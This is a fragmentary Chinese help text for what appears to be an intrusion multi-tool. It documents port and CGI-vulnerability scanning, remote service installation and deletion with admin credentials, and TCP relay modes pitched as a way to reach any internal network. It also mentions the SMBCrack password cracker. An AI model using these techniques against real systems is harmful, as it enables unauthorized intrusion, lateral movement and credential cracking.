--------------------------------------------------------------------------------
6. 扫描器功能.(由于Hscan 0.32源代码丢失, 暂时只有扫描端口(-xport)功能完成. 由Hscan 改
[Scanner:]
- [option]
6.1 端口扫描.(扫描目标机器开放的端口.)
-xport [Port1-Port2|Port1,Port2...] [Option]
[Opation:]
-b 取服务器返回信息.
-d:delay 扫描延时, 为(1-30),默认为 2s, 最大为60s.
-t:thread 扫描的线程, 为(1-1000),默认为200, 最大为1000.
为要扫描的主机名.
为要扫描的主机IP 或IP 段.
[Port1-Port2] 为要扫描的端口范围.
[Port1,Port2...] 为要扫描的端口列表.
如果没有端口信息, 将默认扫描内置的32个端口. 分别为:
21,22,23,25,53,79,80,110,111,113,123,135,139,143,443,445,
512,513,514,515,540,
1080,1433,1521,1524,3306,3389,5631,6000,8000,8080,12345
6.2 CGI漏洞扫描.
-xcgi [option]
[Options:]
-d:delay 扫描延时, 默认为4秒, 最大为60秒. 依网速而定.
-p:port 要扫描的WEB 端口.
-g:post 用POST 模式代替GET.
-t:thread 扫描进程, 默认为100, 最大为500.
-u:url 扫描单个URL.
--------------------------------------------------------------------------------
7. 服务操作. -f:file CGI漏洞列表文件, 如果文件不存在或者未指定, 将扫描内置的1319个CGI 漏
[Services:]
-
7.1 为列出本机或远程主机的服务.
-slist [ ]
all|running|win32|driver>
为列出所有服务.
为列出所有运行中的服务.
和 分别为要列出的服务的类型.
7.2 删除一个本机或远程主机的服务.
-sdel [ ]
为将要删除的服务名.
[ ] 同上.
7.3 启动一个本机或远程主机的服务.
-sstart [ ]
为将要启动的服务名.
[ ] 同上.
7.4 停止一个本机或者远程主机的服务.
-sstop [ ]
为将要停止的服务名.
[ ] 同上.
7.5 暂停一个本机或者远程主机的服务.
-spause [ ]
为将要暂停的服务名.
[ ] 同上.
7.6 查看一个本机或远程主机的服务的详细信息. [ ] 为远程查看服务选项, 分别指定远程IP, 用户名和密码.(必须为ad
-sview [ ]
为将要查看的服务名.
[ ] 同上.
7.7 为本机或者远程主机安装一个服务.
-install [ ]
为本机或远程主机安装一个服务.
为将要安装的服务名称.
为将要安装的服务的显示名称.
为作为服务运行的程序.(必须是服务程序)
--------------------------------------------------------------------------------
8. TCP包转发功能.
[Transmit:]
8.1 为监听两个端口, 把两个端口上接收到的数据做一个交换.
-listen
一个端口等待 slave来连接,
一个等待攻击者来连接.
如果两边都有连接进来, 把两边的数据做一个交换.
即 ListenPort AttackerPort
8.2 为普通包转发功能, 把本机的的某个端口上接收到的数据转发到指定IP 的端口上. -tran
即ListenPort DestIP->DestPort
为监听的端口
为你实际要连接的目标的IP.
为你实际要连接的目标的端口.
如:
-tran 23 192.168.0.1 23
把本机的23端口上接收到的数据转发到192.168.0.1的23端口, 并把192.168.0.1的23端的返 telnet localhost 23 实际上连接的是192.168.0.1的23端口.
8.3 为连接目标IP(TargetIP)的端口(TargetPort), 并连接另一个主机的监听端口.
-slave
3种方法结合, 理论上可以突破任意一种连上互联网的内网.
最后来说说SMBCrack 它是小榕写的速度很快
它的语法是:
smbcrack [端口]
为连接目标IP(TargetIP)的端口(TargetPort), 并连接另一个主机的监听端口, 并把两边的数据